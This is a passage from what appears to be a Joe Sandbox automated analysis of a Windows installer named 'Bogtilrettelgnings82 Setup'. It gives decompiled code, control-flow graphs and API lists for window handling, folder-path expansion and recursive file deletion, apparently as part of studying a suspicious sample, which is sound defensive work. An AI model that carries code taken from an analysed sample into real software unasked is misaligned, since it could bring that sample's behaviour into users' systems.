					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403FCC(_a4);
				if(( *0x4236f8 & 0x00000003) != 0) {
					ShowWindow( *0x422eb0, _t150);
					if(( *0x4236f8 & 0x00000002) != 0) {
						 *0x422eb0 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404001( *0x422ea8);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x4236f8 & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}




































                                                                      0x0040510d
                                                                      0x00405115
                                                                      0x00405118
                                                                      0x00405120
                                                                      0x00405123
                                                                      0x004052b4
                                                                      0x004052ba
                                                                      0x004052d7
                                                                      0x004052de
                                                                      0x004052de
                                                                      0x004052ea
                                                                      0x004052f0
                                                                      0x00405312
                                                                      0x00405312
                                                                      0x00405318
                                                                      0x0040536d
                                                                      0x0040536d
                                                                      0x00405370
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405372
                                                                      0x00405375
                                                                      0x00405378
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405382
                                                                      0x00405388
                                                                      0x0040538a
                                                                      0x0040538d
                                                                      0x0040548a
                                                                      0x00000000
                                                                      0x0040548a
                                                                      0x0040539c
                                                                      0x004053a8
                                                                      0x004053b1
                                                                      0x004053b8
                                                                      0x004053bc
                                                                      0x004053bf
                                                                      0x004053c8
                                                                      0x004053ce
                                                                      0x004053d1
                                                                      0x004053d1
                                                                      0x004053e1
                                                                      0x004053e7
                                                                      0x004053ea
                                                                      0x004053f5
                                                                      0x004053f5
                                                                      0x004053f6
                                                                      0x004053f9
                                                                      0x00405400
                                                                      0x00405407
                                                                      0x0040540f
                                                                      0x0040540f
                                                                      0x0040541d
                                                                      0x00405423
                                                                      0x00405426
                                                                      0x00405426
                                                                      0x0040542d
                                                                      0x00405433
                                                                      0x0040543c
                                                                      0x00405443
                                                                      0x0040544c
                                                                      0x0040544e
                                                                      0x00405451
                                                                      0x00405460
                                                                      0x00405462
                                                                      0x00405465
                                                                      0x00405466
                                                                      0x00405469
                                                                      0x0040546a
                                                                      0x0040546b
                                                                      0x0040546b
                                                                      0x00405473
                                                                      0x0040547e
                                                                      0x00405484
                                                                      0x00405484
                                                                      0x00000000
                                                                      0x004053ea
                                                                      0x0040531a
                                                                      0x00405320
                                                                      0x0040534e
                                                                      0x00405350
                                                                      0x00405356
                                                                      0x00405358
                                                                      0x00405361
                                                                      0x00405361
                                                                      0x00405368
                                                                      0x00000000
                                                                      0x00405368
                                                                      0x00405324
                                                                      0x0040532e
                                                                      0x00000000
                                                                      0x004052f2
                                                                      0x004052f2
                                                                      0x004052f8
                                                                      0x00405333
                                                                      0x00000000
                                                                      0x0040533a
                                                                      0x00405301
                                                                      0x00405308
                                                                      0x0040530d
                                                                      0x00000000
                                                                      0x0040530d
                                                                      0x004052f0
                                                                      0x00405129
                                                                      0x0040512d
                                                                      0x00405136
                                                                      0x0040513d
                                                                      0x00405140
                                                                      0x00405143
                                                                      0x00405146
                                                                      0x00405147
                                                                      0x00405148
                                                                      0x00405161
                                                                      0x00405164
                                                                      0x0040516e
                                                                      0x0040517d
                                                                      0x00405185
                                                                      0x0040518d
                                                                      0x00405192
                                                                      0x00405195
                                                                      0x004051a1
                                                                      0x004051aa
                                                                      0x004051b3
                                                                      0x004051d6
                                                                      0x004051dc
                                                                      0x004051ed
                                                                      0x004051f2
                                                                      0x00405200
                                                                      0x0040520e
                                                                      0x0040520e
                                                                      0x00405213
                                                                      0x00405221
                                                                      0x00405221
                                                                      0x00405226
                                                                      0x00405229
                                                                      0x0040522e
                                                                      0x0040523a
                                                                      0x00405243
                                                                      0x00405250
                                                                      0x0040525f
                                                                      0x00405252
                                                                      0x00405257
                                                                      0x00405257
                                                                      0x0040526b
                                                                      0x0040526b
                                                                      0x0040527f
                                                                      0x00405288
                                                                      0x00405291
                                                                      0x004052a1
                                                                      0x004052ad
                                                                      0x004052ad
                                                                      0x00000000

                                                                      APIs
                                                                      • GetDlgItem.USER32 ref: 00405167
                                                                      • GetDlgItem.USER32 ref: 00405176
                                                                      • GetClientRect.USER32 ref: 004051B3
                                                                      • GetSystemMetrics.USER32 ref: 004051BB
                                                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 004051DC
                                                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 004051ED
                                                                      • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405200
                                                                      • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040520E
                                                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405221
                                                                      • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405243
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405257
                                                                      • GetDlgItem.USER32 ref: 00405278
                                                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405288
                                                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004052A1
                                                                      • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004052AD
                                                                      • GetDlgItem.USER32 ref: 00405185
                                                                        • Part of subcall function 00404001: SendMessageA.USER32(00000028,?,00000001,00403E32), ref: 0040400F
                                                                      • GetDlgItem.USER32 ref: 004052C9
                                                                      • CreateThread.KERNELBASE ref: 004052D7
                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004052DE
                                                                      • ShowWindow.USER32(00000000), ref: 00405301
                                                                      • ShowWindow.USER32(?,00000008), ref: 00405308
                                                                      • ShowWindow.USER32(00000008), ref: 0040534E
                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405382
                                                                      • CreatePopupMenu.USER32 ref: 00405393
                                                                      • AppendMenuA.USER32 ref: 004053A8
                                                                      • GetWindowRect.USER32 ref: 004053C8
                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053E1
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040541D
                                                                      • OpenClipboard.USER32(00000000), ref: 0040542D
                                                                      • EmptyClipboard.USER32 ref: 00405433
                                                                      • GlobalAlloc.KERNEL32(00000042,?), ref: 0040543C
                                                                      • GlobalLock.KERNEL32 ref: 00405446
                                                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040545A
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405473
                                                                      • SetClipboardData.USER32 ref: 0040547E
                                                                      • CloseClipboard.USER32 ref: 00405484
                                                                      Strings
                                                                      • Bogtilrettelgnings82 Setup: Installing, xrefs: 004053F9
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                      • String ID: Bogtilrettelgnings82 Setup: Installing
                                                                      • API String ID: 4154960007-1744407654
                                                                      • Opcode ID: 437612bc1eb72f28560cb0be49cc86cd56c36880779762069c67ba85a006c75e
                                                                      • Instruction ID: 1ce46468062b4959d591950d49ef568145fe019f8889c876f185e2652ae6ab29
                                                                      • Opcode Fuzzy Hash: 437612bc1eb72f28560cb0be49cc86cd56c36880779762069c67ba85a006c75e
                                                                      • Instruction Fuzzy Hash: AFA17A71900209BFDB219FA0DD89AAE7F79FB04345F10407AFA05B62A0C7B55E41DF69
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00405D00 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199stringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 409 405d00-405d0b 410 405d0d-405d1c 409->410 411 405d1e-405d33 409->411 410->411 412 405f26-405f2a 411->412 413 405d39-405d44 411->413 414 405f30-405f3a 412->414 415 405d56-405d60 412->415 413->412 416 405d4a-405d51 413->416 417 405f45-405f46 414->417 418 405f3c-405f40 call 405cde 414->418 415->414 419 405d66-405d6d 415->419 416->412 418->417 421 405d73-405da8 419->421 422 405f19 419->422 423 405ec3-405ec6 421->423 424 405dae-405db9 GetVersion 421->424 425 405f23-405f25 422->425 426 405f1b-405f21 422->426 427 405ef6-405ef9 423->427 428 405ec8-405ecb 423->428 429 405dd3 424->429 430 405dbb-405dbf 424->430 425->412 426->412 434 405f07-405f17 lstrlenA 427->434 435 405efb-405f02 call 405d00 427->435 431 405edb-405ee7 call 405cde 428->431 432 405ecd-405ed9 call 405c3c 428->432 433 405dda-405de1 429->433 430->429 436 405dc1-405dc5 430->436 447 405eec-405ef2 431->447 432->447 439 405de3-405de5 433->439 440 405de6-405de8 433->440 434->412 435->434 436->429 437 405dc7-405dcb 436->437 437->429 443 405dcd-405dd1 437->443 439->440 445 405e21-405e24 440->445 446 405dea-405e0d call 405bc5 440->446 443->433 450 405e34-405e37 445->450 451 405e26-405e32 GetSystemDirectoryA 445->451 457 405e13-405e1c call 405d00 446->457 458 405eaa-405eae 446->458 447->434 449 405ef4 447->449 453 405ebb-405ec1 call 405f49 449->453 455 405ea1-405ea3 450->455 456 405e39-405e47 GetWindowsDirectoryA 450->456 454 405ea5-405ea8 451->454 453->434 454->453 454->458 455->454 459 405e49-405e53 455->459 456->455 457->454 458->453 464 405eb0-405eb6 lstrcatA 458->464 461 405e55-405e58 459->461 462 405e6d-405e83 SHGetSpecialFolderLocation 459->462 461->462 466 405e5a-405e61 461->466 467 405e85-405e9c SHGetPathFromIDListA CoTaskMemFree 462->467 468 405e9e 462->468 464->453 470 405e69-405e6b 466->470 467->454 467->468 468->455 470->454 470->462
                                                                      C-Code - Quality: 74%
                                                                      			E00405D00(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t37;
				CHAR* _t38;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t70;
				signed int _t75;
				signed int _t76;
				intOrPtr _t80;
				char _t82;
				void* _t86;
				CHAR* _t87;
				void* _t89;
				signed int _t96;
				signed int _t98;
				void* _t99;

				_t89 = __esi;
				_t86 = __edi;
				_t64 = __ebx;
				_t37 = _a8;
				if(_t37 < 0) {
					_t80 =  *0x422ebc; // 0x5707f3
					_t37 =  *(_t80 - 4 + _t37 * 4);
				}
				_push(_t64);
				_t75 =  *0x423718 + _t37;
				_t38 = 0x422680;
				_push(_t89);
				_push(_t86);
				_t87 = 0x422680;
				if(_a4 >= 0x422680 && _a4 - 0x422680 < 0x800) {
					_t87 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t82 =  *_t75;
					if(_t82 == 0) {
						break;
					}
					__eflags = _t87 - _t38 - 0x400;
					if(_t87 - _t38 >= 0x400) {
						break;
					}
					_t75 = _t75 + 1;
					__eflags = _t82 - 4;
					_a8 = _t75;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t87 = _t82;
							_t87 =  &(_t87[1]);
							__eflags = _t87;
						} else {
							 *_t87 =  *_t75;
							_t87 =  &(_t87[1]);
							_t75 = _t75 + 1;
						}
						continue;
					}
					_t40 =  *(_t75 + 1);
					_t76 =  *_t75;
					_t96 = (_t40 & 0x0000007f) << 0x00000007 | _t76 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t76 | 0x00000080;
					_t70 = _t76;
					_v24 = _t70;
					__eflags = _t82 - 2;
					_v20 = _t40 | 0x00000080;
					_v16 = _t40;
					if(_t82 != 2) {
						__eflags = _t82 - 3;
						if(_t82 != 3) {
							__eflags = _t82 - 1;
							if(_t82 == 1) {
								__eflags = (_t40 | 0xffffffff) - _t96;
								E00405D00(_t70, _t87, _t96, _t87, (_t40 | 0xffffffff) - _t96);
							}
							L42:
							_t41 = lstrlenA(_t87);
							_t75 = _a8;
							_t87 =  &(_t87[_t41]);
							_t38 = 0x422680;
							continue;
						}
						__eflags = _t96 - 0x1d;
						if(_t96 != 0x1d) {
							__eflags = (_t96 << 0xa) + 0x424000;
							E00405CDE(_t87, (_t96 << 0xa) + 0x424000);
						} else {
							E00405C3C(_t87,  *0x4236e8);
						}
						__eflags = _t96 + 0xffffffeb - 7;
						if(_t96 + 0xffffffeb < 7) {
							L33:
							E00405F49(_t87);
						}
						goto L42;
					}
					_t98 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x423764;
						if( *0x423764 != 0) {
							_t98 = 4;
						}
						__eflags = _t70;
						if(_t70 >= 0) {
							__eflags = _t70 - 0x25;
							if(_t70 != 0x25) {
								__eflags = _t70 - 0x24;
								if(_t70 == 0x24) {
									GetWindowsDirectoryA(_t87, 0x400);
									_t98 = 0;
								}
								while(1) {
									__eflags = _t98;
									if(_t98 == 0) {
										goto L30;
									}
									_t52 =  *0x4236e4;
									_t98 = _t98 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L26:
										_t54 = SHGetSpecialFolderLocation( *0x4236e8,  *(_t99 + _t98 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L28:
											 *_t87 =  *_t87 & 0x00000000;
											__eflags =  *_t87;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t87);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t56 =  *_t52( *0x4236e8,  *(_t99 + _t98 * 4 - 0x18), 0, 0, _t87); // executed
									__eflags = _t56;
									if(_t56 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t87, 0x400);
							goto L30;
						} else {
							_t73 = (_t70 & 0x0000003f) +  *0x423718;
							E00405BC5(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t70 & 0x0000003f) +  *0x423718, _t87, _t70 & 0x00000040);
							__eflags =  *_t87;
							if( *_t87 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t87, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E00405D00(_t73, _t87, _t98, _t87, _v16);
							L30:
							__eflags =  *_t87;
							if( *_t87 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t87 =  *_t87 & 0x00000000;
				if(_a4 == 0) {
					return _t38;
				}
				return E00405CDE(_a4, _t38);
			}





























                                                                      0x00405d00
                                                                      0x00405d00
                                                                      0x00405d00
                                                                      0x00405d06
                                                                      0x00405d0b
                                                                      0x00405d0d
                                                                      0x00405d1c
                                                                      0x00405d1c
                                                                      0x00405d24
                                                                      0x00405d25
                                                                      0x00405d27
                                                                      0x00405d2f
                                                                      0x00405d30
                                                                      0x00405d31
                                                                      0x00405d33
                                                                      0x00405d4a
                                                                      0x00405d4d
                                                                      0x00405d4d
                                                                      0x00405f26
                                                                      0x00405f26
                                                                      0x00405f2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405d5a
                                                                      0x00405d60
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405d66
                                                                      0x00405d67
                                                                      0x00405d6a
                                                                      0x00405d6d
                                                                      0x00405f19
                                                                      0x00405f23
                                                                      0x00405f25
                                                                      0x00405f25
                                                                      0x00405f1b
                                                                      0x00405f1d
                                                                      0x00405f1f
                                                                      0x00405f20
                                                                      0x00405f20
                                                                      0x00000000
                                                                      0x00405f19
                                                                      0x00405d73
                                                                      0x00405d77
                                                                      0x00405d87
                                                                      0x00405d8b
                                                                      0x00405d92
                                                                      0x00405d95
                                                                      0x00405d99
                                                                      0x00405d9f
                                                                      0x00405da2
                                                                      0x00405da5
                                                                      0x00405da8
                                                                      0x00405ec3
                                                                      0x00405ec6
                                                                      0x00405ef6
                                                                      0x00405ef9
                                                                      0x00405efe
                                                                      0x00405f02
                                                                      0x00405f02
                                                                      0x00405f07
                                                                      0x00405f08
                                                                      0x00405f0d
                                                                      0x00405f10
                                                                      0x00405f12
                                                                      0x00000000
                                                                      0x00405f12
                                                                      0x00405ec8
                                                                      0x00405ecb
                                                                      0x00405ee0
                                                                      0x00405ee7
                                                                      0x00405ecd
                                                                      0x00405ed4
                                                                      0x00405ed4
                                                                      0x00405eef
                                                                      0x00405ef2
                                                                      0x00405ebb
                                                                      0x00405ebc
                                                                      0x00405ebc
                                                                      0x00000000
                                                                      0x00405ef2
                                                                      0x00405db0
                                                                      0x00405db1
                                                                      0x00405db7
                                                                      0x00405db9
                                                                      0x00405dd3
                                                                      0x00405dd3
                                                                      0x00405dda
                                                                      0x00405dda
                                                                      0x00405de1
                                                                      0x00405de5
                                                                      0x00405de5
                                                                      0x00405de6
                                                                      0x00405de8
                                                                      0x00405e21
                                                                      0x00405e24
                                                                      0x00405e34
                                                                      0x00405e37
                                                                      0x00405e3f
                                                                      0x00405e45
                                                                      0x00405e45
                                                                      0x00405ea1
                                                                      0x00405ea1
                                                                      0x00405ea3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405e49
                                                                      0x00405e50
                                                                      0x00405e51
                                                                      0x00405e53
                                                                      0x00405e6d
                                                                      0x00405e7b
                                                                      0x00405e81
                                                                      0x00405e83
                                                                      0x00405e9e
                                                                      0x00405e9e
                                                                      0x00405e9e
                                                                      0x00000000
                                                                      0x00405e9e
                                                                      0x00405e89
                                                                      0x00405e94
                                                                      0x00405e9a
                                                                      0x00405e9c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405e9c
                                                                      0x00405e55
                                                                      0x00405e58
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405e67
                                                                      0x00405e69
                                                                      0x00405e6b
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405e6b
                                                                      0x00000000
                                                                      0x00405ea1
                                                                      0x00405e2c
                                                                      0x00000000
                                                                      0x00405dea
                                                                      0x00405def
                                                                      0x00405e05
                                                                      0x00405e0a
                                                                      0x00405e0d
                                                                      0x00405eaa
                                                                      0x00405eaa
                                                                      0x00405eae
                                                                      0x00405eb6
                                                                      0x00405eb6
                                                                      0x00000000
                                                                      0x00405eae
                                                                      0x00405e17
                                                                      0x00405ea5
                                                                      0x00405ea5
                                                                      0x00405ea8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405ea8
                                                                      0x00405de8
                                                                      0x00405dbb
                                                                      0x00405dbf
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405dc1
                                                                      0x00405dc5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00405dc7
                                                                      0x00405dcb
                                                                      0x00000000
                                                                      0x00405dcd
                                                                      0x00405dcd
                                                                      0x00000000
                                                                      0x00405dcd
                                                                      0x00405dcb
                                                                      0x00405f30
                                                                      0x00405f3a
                                                                      0x00405f46
                                                                      0x00405f46
                                                                      0x00000000

                                                                      APIs
                                                                      • GetVersion.KERNEL32(?,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00405001,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000), ref: 00405DB1
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00405E2C
                                                                      • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000400), ref: 00405E3F
                                                                      • SHGetSpecialFolderLocation.SHELL32(?,00000000), ref: 00405E7B
                                                                      • SHGetPathFromIDListA.SHELL32(00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade), ref: 00405E89
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00405E94
                                                                      • lstrcatA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,\Microsoft\Internet Explorer\Quick Launch), ref: 00405EB6
                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,?,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000,00405001,Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade,00000000), ref: 00405F08
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.751804225.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.751796192.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751813133.0000000000407000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000409000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000421000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000429000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751821324.0000000000433000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000435000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 00000002.00000002.751873188.0000000000475000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_iqb3.jbxd
                                                                      Similarity
                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$Create folder: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Langust\Grade$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                      • API String ID: 900638850-742040737
                                                                      • Opcode ID: 6248596aa2a3f32bb0f27d4d089357d57926bfd5a2cc4d0eec9b3e0488fff0f8
                                                                      • Instruction ID: 5b78479c63d7672d4d5e7177f0c07aa329b3d72ca06d4f46a7854d902b85ef7c
                                                                      • Opcode Fuzzy Hash: 6248596aa2a3f32bb0f27d4d089357d57926bfd5a2cc4d0eec9b3e0488fff0f8
                                                                      • Instruction Fuzzy Hash: B661F171A04A01ABEF205F24DC88BAF3B68EB15314F10813BE941B62D0D33D5A42DF9E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0040559E Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 471 40559e-4055c4 call 40585c 474 4055c6-4055d8 DeleteFileA 471->474 475 4055dd-4055e4 471->475 476 405767-40576b 474->476 477 4055e6-4055e8 475->477 478 4055f7-405607 call 405cde 475->478 480 405715-40571a 477->480 481 4055ee-4055f1 477->481 484 405616-405617 call 4057b5 478->484 485 405609-405614 lstrcatA 478->485 480->476 483 40571c-40571f 480->483 481->478 481->480 486 405721-405727 483->486 487 405729-405731 call 405fe2 483->487 488 40561c-40561f 484->488 485->488 486->476 487->476 494 405733-405747 call 40576e call 405556 487->494 491 405621-405628 488->491 492 40562a-405630 lstrcatA 488->492 491->492 495 405635-405653 lstrlenA FindFirstFileA 491->495 492->495 509 405749-40574c 494->509 510 40575f-405762 call 404fc9 494->510 497 405659-405670 call 405799 495->497 498 40570b-40570f 495->498 505 405672-405676 497->505 506 40567b-40567e 497->506 498->480 500 405711 498->500 500->480 505->506 511 405678 505->511 507 405680-405685 506->507 508 405691-40569f call 405cde 506->508 512 405687-405689 507->512 513 4056ea-4056fc FindNextFileA 507->513 521 4056a1-4056a9 508->521 522 4056b6-4056c1 call 405556 508->522 509->486 515 40574e-40575d call 404fc9 call 405b92 509->515 510->476 511->506 512->508 517 40568b-40568f 512->517 513->497 519 405702-405705 FindClose 513->519 515->476 517->508 517->513 519->498 521->513 524 4056ab-4056b4 call 40559e 521->524 531 4056e2-4056e5 call 404fc9 522->531 532 4056c3-4056c6 522->532 524->513 531->513 534 4056c8-4056d8 call 404fc9 call 405b92 532->534 535 4056da-4056e0 532->535 534->513 535->513
                                                                      C-Code - Quality: 98%
                                                                      			E0040559E(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				CHAR* _t72;
				char* _t75;

				_t69 = _a8;
				_t72 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E0040585C(__eflags, _t72);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x423768 =  *0x423768 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00405CDE(0x420ce8, _t72);
					__eflags = _a4;
					if(_a4 == 0) {
						E004057B5(_t72);
					} else {
						lstrcatA(0x420ce8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409014);
						L11:
						_t71 =  &(_t72[lstrlenA(_t72)]);
						_t40 = FindFirstFileA(0x420ce8,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v336.cFileName);
							_t53 = E00405799( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t75 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405CDE(_t71, _t75);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E00405556(__eflags, _t72, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E00404FC9(0xfffffff2, _t72);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x423768 =  *0x423768 + 1;
										} else {
											E00404FC9(0xfffffff1, _t72);
											E00405B92(_t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040559E(__eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x420ce8 - 0x5c;
					if( *0x420ce8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E00405FE2(_t72);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E0040576E(_t72);
							_t40 = E00405556(__eflags, _t72, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
